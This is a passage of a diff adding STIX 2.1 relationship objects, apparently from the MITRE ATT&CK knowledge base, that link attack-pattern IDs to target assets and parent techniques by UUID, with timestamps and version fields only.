"3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e105164b-cc0e-4b33-a397-75da41d6d89d", + "created": "2024-06-27T09:29:49.838Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:29:49.838Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e115b2b7-245a-430a-b84a-08c71b94b04e", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e11b5f3d-d58b-40d7-aafd-09a958b5e1cc", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e12479db-6614-4ebd-80cb-175fc1979b72", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1269074-37f4-460b-8a2a-cd26892d4f8e", + "created": "2023-09-28T19:42:54.009Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:42:54.009Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e128847e-b3ae-420a-b46f-cb9db88f2cf4", + "created": "2020-03-13T21:14:58.418Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e12a3e0d-4ed1-467b-a2f1-ead1e58b8cae", + "created": "2020-06-26T04:01:09.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e134a00e-8d72-4c3d-a5b1-3f9c6e1bd330", + "created": "2020-10-01T00:50:30.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e13d61ae-345c-497b-ad26-28cf8782ec8a", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1403196-e682-4d7f-8c13-0fc7b5ba2f4b", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1447e35-8091-434a-975d-e6736bd57f3e", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1611796-f95b-4b0e-bdbb-fe1062302fdf", + "created": "2024-06-26T15:35:33.861Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:35:33.861Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e17c3b74-69d8-47b2-88d4-adcaf418ab74", + "created": "2023-09-29T17:08:48.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:08:48.251Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e182514a-1dad-4d02-afea-6435d7f8ca65", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e185265c-75ec-481e-926c-9c98a45045cf", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1a62cd4-3ab4-4312-acc6-8e3e30eb7145", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1bdbedf-d3d7-4243-8473-439d2be55fea", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1d47c3d-5647-49fa-964c-3b76e94d009b", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1f28ed0-ec35-4792-ae02-a2d003bd3df4", + "created": "2023-09-28T20:09:07.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:09:07.381Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e1f6d665-c7c0-4453-8458-dcfd56127285", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e235cbd7-4074-490e-a28e-ed89ba56e0e4", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e252e634-8acd-4115-ac2f-e74f75df1d70", + "created": "2024-06-26T15:27:32.673Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:27:32.673Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2869339-29be-4068-af18-2a09ef48732b", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2879da3-d867-4379-8e38-eee1757dfee7", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2969ee2-7b65-4ad2-9843-596c40318d82", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2980209-0a3b-4d12-8a85-1984b8e1844b", + "created": "2020-02-20T21:09:56.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2a6a14d-87d3-4a8b-966f-fb3c1fab6e87", + "created": "2020-02-11T19:06:19.039Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", + "target_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2a826e3-96d6-4d5b-9576-c4c797d688d4", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2bc9a56-67a2-4a1d-835b-dbe6c1fa9b66", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e2c4938a-debe-4060-ab72-2c2c88c25e5b", + "created": "2024-06-26T14:50:35.677Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:50:35.677Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e302548b-a3fd-4d6e-89f8-027639d723ea", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e316a9c7-7c1a-4490-8a53-cc12aecfd9a7", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e344ae4f-eb7a-4480-8c1f-f1f0fb9411a6", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e352c4bb-4148-4ca7-940c-ca2e2c4802b6", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e367aefb-5784-4fd8-85ac-56afa3f9e504", + "created": "2020-03-30T19:16:29.761Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", + "target_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e37047e1-f38c-4e11-ac80-e10d5d6a1159", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e372e9b5-675f-4cb4-b295-18cfeead1e7c", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e376d43f-2c63-42e5-96ea-728ea09009a8", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3785242-1125-4c73-86df-5dd71be826a8", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": 